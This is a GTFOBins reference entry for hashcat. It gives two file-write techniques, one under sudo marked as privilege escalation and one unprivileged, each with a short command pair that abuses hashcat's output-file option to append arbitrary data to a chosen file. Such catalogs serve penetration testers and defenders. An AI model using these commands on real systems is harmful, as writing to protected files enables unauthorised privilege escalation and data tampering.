Catalog GTFOBins

GTFO · Tool

hashcat

2 techniques LinuxGTFOBins GPL-3.0

file-write

File WritePrivilege Escalation Linux

Append data to the end of the output file, creating if does not exist.

echo -n DATA | tee /path/to/wordlist | md5sum | awk '{print $1}' >/path/to/hash
hashcat -m 0 --quiet --potfile-disable -o /path/to/output-file --outfile-format=2 --outfile-autohex-disable /path/to/hash /path/to/wordlist
Context
sudo
Native
file-write
MITRE
T1565

file-write

File Write Linux

Append data to the end of the output file, creating if does not exist.

echo -n DATA | tee /path/to/wordlist | md5sum | awk '{print $1}' >/path/to/hash
hashcat -m 0 --quiet --potfile-disable -o /path/to/output-file --outfile-format=2 --outfile-autohex-disable /path/to/hash /path/to/wordlist
Context
unprivileged
Native
file-write
MITRE
T1565